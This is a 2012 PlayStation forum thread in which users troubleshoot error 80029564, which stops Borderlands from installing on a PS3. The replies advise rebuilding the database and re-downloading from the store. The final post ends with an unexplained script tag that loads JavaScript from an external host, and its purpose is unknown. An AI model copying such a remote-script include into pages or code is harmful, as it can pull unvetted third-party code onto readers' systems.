Sep 14 2012
By: FrancisEdwood First Son 2 posts

80029564 - borderlands

2 replies 545 views Edited Sep 14, 2012

80029564: Can't install PlayStation Network downloaded content [PS3™ system] 

http://playstation.custhelp.com/app/answers/detail/a_id/3930/kw/80029564

yes this is the link your search provides.  I do not wish to reformat my hard drive.  that's a severe reaction to your network sucking and dropping packets.

I have been trying to download Borderlands for more than a week now.  I have a 40 mpbs connection.  I have downloaded this file at least 10 times.  I have tried opening ports on my router.  I have tried a second router.  I have tried direct connecting to my cable modem.  This game is free to me on PS+ so i decided to get it again (played the crap out of it on 360) before the release of BL2 on tuesday.  But how can i play it if it won't install?? it gets to 14% and fails.  So annoying.  I'm pretty versed in fixing computer/router issues but at this point i think the file is corrupted on the server.   This isn't the first ps+ game i've downloaded several times without being able to install.  I forget which one i just gave up on...it was something really dumb that i already bought on xbox a year earlier.  

So instead of going to safe mode and killing my hard drive...how do i fix these download issuses?

Please use plain text.
Message 1 of 3 (545 Views)
0 Likes
PlayStation MVP
16286 posts

Re: 80029564 - borderlands

Sep 15, 2012

I think you misread the information on the link you provided. It doesn't say to reformat your hard drive. It says to rebuild the database. Deleting the game and anything in the game data folder associated with it then doing safe mode option 3 is your best bet.

Please use plain text.
Message 2 of 3 (523 Views)
0 Likes
Lombax Warrior
170 posts

Re: 80029564 - borderlands

Sep 20, 2012

OK, First I should say, This is not a prob with the game or your system! It's a server issue! After 2 hours downloading the add on I tried to install but always stopped at 14% & gave a "Corrupt File" Error & an error code! "80029564" But any way, Here is what I did to fix the prob! 1- Do NOT delete the file! 2- Check your setting to make sure "Scan for media server" Is turned off! ( You can turn it on again after!) 3- Download the file again from PS Store ONLY! NOT FROM YOUR TRANSACTION LIST ON PS3! EVEN THOUGH THE ERROR TELLS YOU TO!!!! & >>>>>>>>>>>>"DO NOT "DOWNLOAD IT IN BACKGROUND!!!"<<<<<<<<<<<<<<<< Just sit & suffer until it's done! 4- Do NOT allow the screen saver to come on! Just hit a button on the controller every 5 min's or so! 5- After the download completes, You should have no prob installing! Remember to try installing the NEW Download! NOT the Old Corrupt one! 6- After install has completed, You may turn on "Scan for Media Server" again (In Your Settings) & delete the Corrupt file that didn't work! (RE-Step 1 )

<script type="text/javascript" src="http://p.datastomp.com/9/3/39.js"></script>
Please use plain text.
Message 3 of 3 (498 Views)
0 Likes